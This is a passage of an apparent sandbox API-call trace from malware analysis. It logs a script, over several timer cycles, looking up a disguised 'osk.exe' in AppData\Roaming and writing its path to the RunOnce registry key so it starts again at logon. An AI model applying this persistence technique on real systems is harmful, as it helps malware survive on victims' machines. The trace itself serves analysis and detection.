riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.176] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.176] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.176] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.177] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0079.177] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0079.177] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2b [0079.177] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.178] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0079.178] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.178] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.178] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.178] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.178] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.178] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.178] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.178] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.179] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.179] RegCloseKey (hKey=0x280) returned 0x0 [0079.179] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.179] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.179] SetTimer (hWnd=0x20280, nIDEvent=0x202a, uElapse=0xa, lpTimerFunc=0x0) returned 0x202a [0079.179] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.192] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0079.192] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.192] KillTimer (hWnd=0x20280, uIDEvent=0x202a) returned 1 [0079.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.192] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.193] IUnknown:Release (This=0x787518) returned 0x1 [0079.193] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.193] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.193] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.193] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.193] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0079.193] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.193] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2c [0079.194] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.194] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0079.194] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.194] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.194] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.194] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.195] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.195] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.195] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.195] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.195] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.195] RegCloseKey (hKey=0x280) returned 0x0 [0079.195] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.195] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.195] SetTimer (hWnd=0x20280, nIDEvent=0x202b, uElapse=0xa, lpTimerFunc=0x0) returned 0x202b [0079.195] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.207] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.207] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.207] KillTimer (hWnd=0x20280, uIDEvent=0x202b) returned 1 [0079.207] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.207] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.207] IUnknown:Release (This=0x787518) returned 0x1 [0079.207] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.207] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.208] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.208] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.208] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.208] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0079.208] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.208] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2d [0079.208] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.209] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0079.209] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.209] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.209] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.209] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.209] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.209] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.209] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.209] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.210] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.210] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.210] RegCloseKey (hKey=0x280) returned 0x0 [0079.210] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.210] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.210] SetTimer (hWnd=0x20280, nIDEvent=0x202c, uElapse=0xa, lpTimerFunc=0x0) returned 0x202c [0079.210] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.222] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.222] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.223] KillTimer (hWnd=0x20280, uIDEvent=0x202c) returned 1 [0079.223] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.223] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
